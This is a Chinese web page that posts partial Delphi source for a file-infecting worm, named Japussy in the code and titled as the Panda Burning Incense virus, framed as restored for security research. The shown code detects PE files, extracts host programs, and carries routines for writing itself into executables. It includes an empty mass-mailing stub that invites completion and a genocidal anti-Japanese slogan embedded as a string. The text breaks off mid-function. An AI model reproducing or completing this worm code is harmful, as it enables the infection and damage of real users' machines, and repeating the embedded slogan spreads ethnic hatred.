熊猫烧香 delphi
源代码(仅用于安全研究)——用 OD(OllyDbg)分析病毒样本后复原出的源程序。(本文来自本站原创,转载请务必注明出处!)熊猫烧香 - 核心源码 Delphi 版本 -----------------------------------仅供研究使用,后果自行负责!
安全提示:下面是可自我复制、会感染 PE 文件并把自身写入宿主程序头部的蠕虫源码,不是普通示例代码。本页标题称其为"熊猫烧香",但代码中的程序名是 Japussy,内嵌的标记字符串也写明 "W32.Japussy.Worm.A",两者的对应关系请以反病毒厂商的样本分析为准。请勿在联网机器或存有真实数据的机器上编译、运行;分析应在隔离、可回滚快照的虚拟机中进行。代码中留空的传播功能(如 SendMail)请勿补全;传播恶意程序在多数司法辖区属违法行为。
program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE 文件主图标的偏移量 //在我的
Delphi5 SP1 上面编译得到的大小,其它版本的 Delphi 可能不同 //查找 2800000020 的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; IconOffset = $92BC;
//Upx 压缩过病毒体的大小 //Upx
压缩过 PE 文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE 文件主图标的大小--744 字节 IconTail = IconOffset + IconSize; //PE 文件主图标的尾部 ID = $44444444; //感染标记 //我非常爱你码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为 Win9x } function IsWin9x: Boolean;
var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; { 在流之间复制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; { 将宿主文件从已感染的 PE 文件中分离出来,以备使用 } procedure ExtractFile(FileName: string); var sStream, dStream: TFileStream; begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end;
end; { 填充 STARTUPINFO 结构 } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; { 发带毒邮件 } procedure SendMail; begin //哪位仁兄愿意完成之?汤姆感激不尽! end; { 感染 PE 文件 } procedure InfectOneFile(FileName: string); var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemor
yStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char; begin try //出错则文件正在被使用,退出 if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查 PE 文件头 begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE 标记 begin IsPE := True; //是 PE 文件 Break; end; end; SrcStream.Seek(-4,